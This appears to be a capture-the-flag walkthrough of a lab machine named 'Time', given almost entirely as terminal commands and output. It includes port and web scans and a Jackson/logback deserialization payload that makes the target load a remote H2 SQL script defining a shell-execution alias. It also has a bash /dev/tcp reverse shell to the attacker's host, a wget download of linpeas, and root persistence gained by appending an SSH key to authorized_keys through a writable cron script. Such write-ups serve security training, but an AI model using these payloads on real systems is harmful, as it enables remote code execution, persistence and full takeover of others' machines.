$ sudo nmap -p- -T4 -A 10.10.10.214
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
| 256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_ 256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
$ nikto -h http://10.10.10.214
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
$ dirb http://10.10.10.214
---- Scanning URL: http://10.10.10.214/ ----
==> DIRECTORY: http://10.10.10.214/css/
==> DIRECTORY: http://10.10.10.214/fonts/
==> DIRECTORY: http://10.10.10.214/images/
+ http://10.10.10.214/index.php (CODE:200|SIZE:3813)
==> DIRECTORY: http://10.10.10.214/javascript/
==> DIRECTORY: http://10.10.10.214/js/
+ http://10.10.10.214/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.10.214/vendor/
---- Entering directory: http://10.10.10.214/css/ ----
---- Entering directory: http://10.10.10.214/fonts/ ----
---- Entering directory: http://10.10.10.214/images/ ----
==> DIRECTORY: http://10.10.10.214/images/icons/
---- Entering directory: http://10.10.10.214/javascript/ ----
==> DIRECTORY: http://10.10.10.214/javascript/jquery/
---- Entering directory: http://10.10.10.214/js/ ----
---- Entering directory: http://10.10.10.214/vendor/ ----
==> DIRECTORY: http://10.10.10.214/vendor/jquery/
---- Entering directory: http://10.10.10.214/images/icons/ ----
+ http://10.10.10.214/images/icons/favicon.ico (CODE:200|SIZE:32038)
---- Entering directory: http://10.10.10.214/javascript/jquery/ ----
+ http://10.10.10.214/javascript/jquery/jquery (CODE:200|SIZE:271809)
---- Entering directory: http://10.10.10.214/vendor/jquery/ ----
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: No content to map due to end-of-input
PoC
sudo python3 -m http.server 80
sudo tcpdump -ni tun0 icmp
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.133/test.sql'"}]
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.214 - - [19/May/2021 08:17:04] "GET /test.sql HTTP/1.1" 200 -
test.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('id > exploited.txt')
test.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('ping -c 1 10.10.14.133')
kali@kali:~/0.htb/machines/Time214$ sudo tcpdump -ni tun0 icmp
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
15:13:25.955134 IP 10.10.10.214 > 10.10.14.133: ICMP echo request, id 1, seq 1, length 64
15:13:25.955158 IP 10.10.14.133 > 10.10.10.214: ICMP echo reply, id 1, seq 1, length 64
sudo nc -lvnp 443
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.133/rev.sql'"}]
rev.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -c "bash -i >& /dev/tcp/10.10.14.133/443 0>&1"')
kali@kali:~/0.htb/machines/Time214$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [10.10.14.133] from (UNKNOWN) [10.10.10.214] 59200
bash: cannot set terminal process group (848): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$
python3 -c 'import pty;pty.spawn("bash")'
^Z
stty raw -echo; fg
pericles@time:/var/www/html$ ppyytthhoonn33 --cc ''iimmppoorrtt ppttyy;;ppttyy..ssppaawwnn((""bbaasshh""))''
pericles@time:/var/www/html$ ^Z
[1]+ Stopped sudo nc -lvnp 443
kali@kali:~/0.htb/machines/Time214$ stty raw -echo; fg
sudo nc -lvnp 443
pericles@time:/var/www/html$
pericles@time:/var/www/html$ cat /home/pericles/user.txt
e03e50bb42c432875226647834ac4122
pericles@time:/var/www/html$
Shell as root Enumeration
pericles@time:/dev/shm$ wget 10.10.14.133/linpeas.sh
pericles@time:/dev/shm$ chmod +x linpeas.sh
pericles@time:/dev/shm$ ./linpeas.sh
[+] Interesting GROUP writable files (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group pericles:
/usr/bin/timer_backup.sh
pericles@time:/dev/shm$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
pericles@time:/dev/shm$
echo "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeYZ9sJVrH4IfMx50cZSfpnsdi98SgU4WtQHUjXcyHsx9jD5RJaviSdt3JijTSP4+ctXbMoZWqv/dDFKSN3N2aG8U2gjhaabAzQU8ICo4Ow/qZNlyNLW4mD7SJK44rmga6c03PsygOH+E0UQpW/cOgUym7Oaj0qYL5caN0q/0b5lJqTsMpxOmUz6+TXFiVH+PjaLb5RJo8YRbGZN51cY9/hFmuXuNuXfGRPNS7VAaun9Cu+tLqgx334GvqriUdU6HxT5N/wkTy4wum/Oi94/o4rzbLTZYhCpQMtm1k1CVht9YO6RpjioB3hUTKR7UKtgBoo6d0fNVZld0kRP8jf9l995/6QOfUGbCK2eHAxKdBqFqa5cdRMezFE1DrVDrNX1dbYHJOs8QFJMp042Q+ecoORleFfhVA5ZtcGTsXkA9peXC9SAkec3PtuUEULXS5ait6hEqQk7Tzps4j8LG+vtL3TTWZDLN/4MVLudWZi8Y4or7yrCTwh7HKFfiWR2NG//E= kali@kali
' >> /root/.ssh/authorized_keys " >>/usr/bin/timer_backup.sh
pericles@time:/dev/shm$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeYZ9sJVrH4IfMx50cZSfpnsdi98SgU4WtQHUjXcyHsx9jD5RJaviSdt3JijTSP4+ctXbMoZWqv/dDFKSN3N2aG8U2gjhaabAzQU8ICo4Ow/qZNlyNLW4mD7SJK44rmga6c03PsygOH+E0UQpW/cOgUym7Oaj0qYL5caN0q/0b5lJqTsMpxOmUz6+TXFiVH+PjaLb5RJo8YRbGZN51cY9/hFmuXuNuXfGRPNS7VAaun9Cu+tLqgx334GvqriUdU6HxT5N/wkTy4wum/Oi94/o4rzbLTZYhCpQMtm1k1CVht9YO6RpjioB3hUTKR7UKtgBoo6d0fNVZld0kRP8jf9l995/6QOfUGbCK2eHAxKdBqFqa5cdRMezFE1DrVDrNX1dbYHJOs8QFJMp042Q+ecoORleFfhVA5ZtcGTsXkA9peXC9SAkec3PtuUEULXS5ait6hEqQk7Tzps4j8LG+vtL3TTWZDLN/4MVLudWZi8Y4or7yrCTwh7HKFfiWR2NG//E= kali@kali
' >> /root/.ssh/authorized_keys
pericles@time:/dev/shm$
kali@kali:~/0.htb/machines/Time214$ ssh root@10.10.10.214
The authenticity of host '10.10.10.214 (10.10.10.214)' can't be established.
ECDSA key fingerprint is SHA256:sMBq2ECkw0OgfWnm+CdzEgN36He1XtCyD76MEhD/EKU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.214' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-52-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 20 May 2021 02:28:08 PM UTC
System load: 0.0
Usage of /: 18.8% of 27.43GB
Memory usage: 27%
Swap usage: 0%
Processes: 232
Users logged in: 0
IPv4 address for ens160: 10.10.10.214
IPv6 address for ens160: dead:beef::250:56ff:feb9:ead6
168 updates can be installed immediately.
47 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Feb 9 14:41:33 2021
root@time:~#
root@time:~# cat root.txt
ef379971aacb57b6fc51351c83b8fb98
root@time:~#